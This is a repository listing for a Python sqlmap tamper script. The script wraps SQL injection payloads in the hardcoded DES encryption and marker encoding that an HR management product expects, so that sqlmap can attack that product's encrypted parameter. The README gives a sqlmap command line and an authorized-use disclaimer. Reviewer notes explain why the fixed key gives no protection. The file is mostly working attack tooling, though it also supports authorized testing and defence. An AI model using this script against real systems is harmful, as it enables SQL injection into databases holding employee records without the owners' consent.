# Repository listing: README.md, __init__.py, hrmsTamper.py
#
# README.md (translated from the original Chinese)
# ------------------------------------------------
# HrmsTamper: an encrypt/decrypt helper for a certain EHR & HRM product that
# can be used directly as a sqlmap tamper script.
#
# The logic comes from https://github.com/vaycore/HrmsTool. The original is
# written in Java and needs the injection statement to be supplied by hand to
# generate each payload, which is tedious, so this tamper script was written.
#
# The script does not have to be copied into sqlmap's tamper directory; run it
# from this directory:
#
#     sqlmap -u "https://example.com/?code=1" -p "code" --tamper hrmsTamper.py
#
# If the target interface does not use DES, edit tamper() in hrmsTamper.py and
# call encodeSafe(payload) instead of encryptEncode(payload).
#
# Disclaimer: this tool is intended only for legally authorized enterprise
# security work, such as internal attack/defence exercises, vulnerability
# verification and retesting. To try the tool, build your own test target.
# When using it, make sure the activity complies with local laws and
# regulations and that sufficient authorization has been obtained. Do not use
# it against unauthorized targets. You bear the consequences of any illegal
# use; the authors accept no legal or joint liability.
#
# __init__.py:
# https://raw.githubusercontent.com/Schira4396/HrmsTamper/ffad348d5455ac71fe47c33d3b303549cdbcc86c/__init__.py
#
# hrmsTamper.py
# -------------
# Reviewer notes for defenders:
# - The DES key and IV below are constants shipped in this file (and, per the
#   README, in the Java tool it was ported from). Anyone can produce a valid
#   ciphertext, so an application that decrypts such a parameter learns
#   nothing about who produced it: the plaintext is still untrusted input and
#   must reach the database only through parameterized queries.
# - Single DES has a 56-bit effective key and is obsolete as a cipher; here it
#   acts as an encoding layer, not as a security control.
# - Because the parameter travels encrypted, inspection placed in front of the
#   application sees only Base64-like text with "PAATTP..." markers; input
#   validation and logging of the decoded value have to happen after
#   decryption on the server side.

from pyDes import des, CBC, PAD_PKCS5
import base64
from sqlmap.lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

# Ordered substitutions applied to the Base64 text by encryptEncode().
# Order matters: every marker contains "@", and "@" itself is rewritten last.
_MARKER_SUBSTITUTIONS = (
    ("+", "@2HJB@"),
    ("%", "@2HJ5@"),
    (" ", "@2HJ0@"),
    ("/", "@2HJF@"),
    ("?", "@3HJF@"),
    ("#", "@2HJ3@"),
    ("&", "@2HJ6@"),
    ("=", "@3HJD@"),
    ("\r\n", ""),
    ("\n", ""),
    ("\r", ""),
    ("@", "PAATTP"),
)


def encrypt2(data):
    """Encrypt *data* with DES in CBC mode and return it as Base64 text.

    The text is UTF-8 encoded, padded with PKCS#5, encrypted with the fixed
    key and IV below, and the ciphertext is Base64 encoded.

    Args:
        data: text to encrypt.

    Returns:
        The Base64 encoding of the ciphertext, as a str.
    """
    # The IV must be the raw bytes 0x01..0x08; the text "12345678" is a
    # different value and does not work here.
    iv = bytes(range(1, 9))

    # The cipher is constructed with a placeholder 8-character key and the
    # real key is installed afterwards through setKey().
    cipher = des("0" * 8, CBC, iv, pad=None, padmode=PAD_PKCS5)
    # NOTE(review): this key is 13 characters, longer than a DES key;
    # presumably pyDes derives the sub-keys from the leading 8 bytes. Confirm
    # against the pyDes version in use.
    cipher.setKey("ilovethisgame")

    ciphertext = cipher.encrypt(data.encode("UTF-8"))
    return base64.b64encode(ciphertext).decode("UTF-8")


def encryptEncode(paramString) -> str:
    """Encrypt *paramString* and rewrite URL-sensitive characters as markers.

    The Base64 text from encrypt2() is passed through the substitutions in
    _MARKER_SUBSTITUTIONS, in order: special characters become "@....@"
    markers, line breaks are removed, and finally every "@" becomes "PAATTP".

    Args:
        paramString: text to encode, or None.

    Returns:
        The encoded text, or "" when *paramString* is None.
    """
    if paramString is None:
        return ""

    encoded = encrypt2(paramString)
    for needle, marker in _MARKER_SUBSTITUTIONS:
        encoded = encoded.replace(needle, marker)
    return encoded


def encodeSafe(paramString) -> str:
    """Escape every character of *paramString* that is not an ASCII letter.

    ASCII letters (A-Z, a-z) are copied unchanged. Any other character up to
    U+00FF is written as "~" followed by its hexadecimal code point, and any
    character above U+00FF as "^" followed by its hexadecimal code point.

    Args:
        paramString: text to encode.

    Returns:
        The escaped text.
    """
    pieces = []
    for ch in paramString:
        code_hex = hex(ord(ch))[2:]
        # NOTE(review): the original also built a zero-padded form of the
        # code point in a variable it never used; the emitted text has always
        # been the unpadded hex, which is reproduced here.
        if ch > "\u00ff":
            pieces.append("^" + code_hex)
        elif "A" <= ch <= "Z" or "a" <= ch <= "z":
            pieces.append(ch)
        else:
            pieces.append("~" + code_hex)
    return "".join(pieces)


def dependencies():
    """Hook that sqlmap tamper modules may define; this one does nothing."""
    return None


def tamper(payload, **kwargs):
    """Return *payload* encoded with encryptEncode().

    Args:
        payload: the payload text handed over by sqlmap.
        **kwargs: accepted for the tamper interface and not used.

    Returns:
        The encoded payload.
    """
    return encryptEncode(payload)